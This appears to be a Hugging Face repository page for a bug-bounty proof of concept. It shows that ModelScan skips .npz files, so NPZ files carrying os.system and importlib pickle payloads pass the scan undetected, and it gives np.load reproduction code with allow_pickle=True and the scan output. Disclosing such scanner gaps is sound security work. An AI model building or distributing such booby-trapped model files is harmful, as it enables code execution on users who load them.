Hugging Face's logo

Skyflocka
/
numpy-npz-modelscan-bypass-poc

security-research
poc
Model card Files
xet
 Community

NPZ ModelScan Bypass PoC

Security Research - Huntr MFV Submission

This repository demonstrates that ModelScan completely skips .npz files, reporting them as SCAN_NOT_SUPPORTED. A malicious .npz file containing arbitrary code execution payloads passes ModelScan with zero issues detected.

Files

  • malicious_model.npz - NPZ with os.system payload (simple RCE)
  • importlib_bypass.npz - NPZ with importlib.import_module bypass chain

Reproduction 

import numpy as np

# WARNING: This executes code. Use in isolated environment only.
data = np.load('malicious_model.npz', allow_pickle=True)
result = data['weights']  # RCE triggers here

ModelScan Result 

$ modelscan -p malicious_model.npz
Total issues: 0
Skipped: SCAN_NOT_SUPPORTED - Model Scan did not scan file

Impact

An attacker can upload a malicious .npz model file to any model hub. When a user downloads and loads the file with numpy.load(allow_pickle=True), arbitrary code executes. ModelScan provides no protection for this format.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support